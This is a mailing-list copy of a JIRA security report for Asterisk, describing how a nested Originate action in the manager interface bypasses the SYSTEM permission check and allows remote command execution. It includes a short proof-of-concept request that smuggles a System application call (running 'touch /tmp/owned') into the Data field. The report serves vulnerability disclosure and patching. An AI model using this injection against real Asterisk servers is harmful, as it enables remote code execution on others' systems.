[asterisk-bugs] [JIRA] (ASTERISK-28580) Bypass SYSTEM write permission in manager action allows system commands execution
Asterisk Team (JIRA)
noreply at issues.asterisk.org
Wed Sep 9 11:20:45 CDT 2020
[ https://issues.asterisk.org/jira/browse/ASTERISK-28580?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Asterisk Team updated ASTERISK-28580:
-------------------------------------
Target Release Version/s: 18.0.0
> Bypass SYSTEM write permission in manager action allows system commands execution
> ---------------------------------------------------------------------------------
>
> Key: ASTERISK-28580
> URL: https://issues.asterisk.org/jira/browse/ASTERISK-28580
> Project: Asterisk
> Issue Type: Security
> Components: Core/ManagerInterface
> Affects Versions: GIT
> Reporter: Eliel SardaƱons
> Assignee: Unassigned
> Severity: Blocker
> Labels: patch, security
> Target Release: 13.29.2, 13.30.0, 16.6.2, 16.7.0, 17.0.1, 17.1.0, 18.0.0
>
> Attachments: 908eb49.diff
>
>
> it is possible to bypass the SYSTEM write permission in manager if the user is allowed to originate calls allowing remote code execution to the asterisk server.
> The current validation is found in this line of code https://github.com/asterisk/asterisk/blob/8aa4e1c3c99b58f072888ce8798623be227910c6/main/manager.c#L5735
> As you may notice all the validations are made on the application name so if we craft an action Originate with an Originate Application and end up running a SYSTEM application we can bypass this checks:
> Action: Originate
> Channel: Local/1111 at eliel
> Application: Originate
> Data: Local/2222 at eliel,app,System,touch /tmp/owned
> I tested it with a user with this permissions:
> read = call,log,verbose,agent,user,config,dtmf,reporting,cdr,dialplan
> write = call,agent,user,config,command,reporting,originate,message
--
This message was sent by Atlassian JIRA
(v6.2#6252)
More information about the asterisk-bugs
mailing list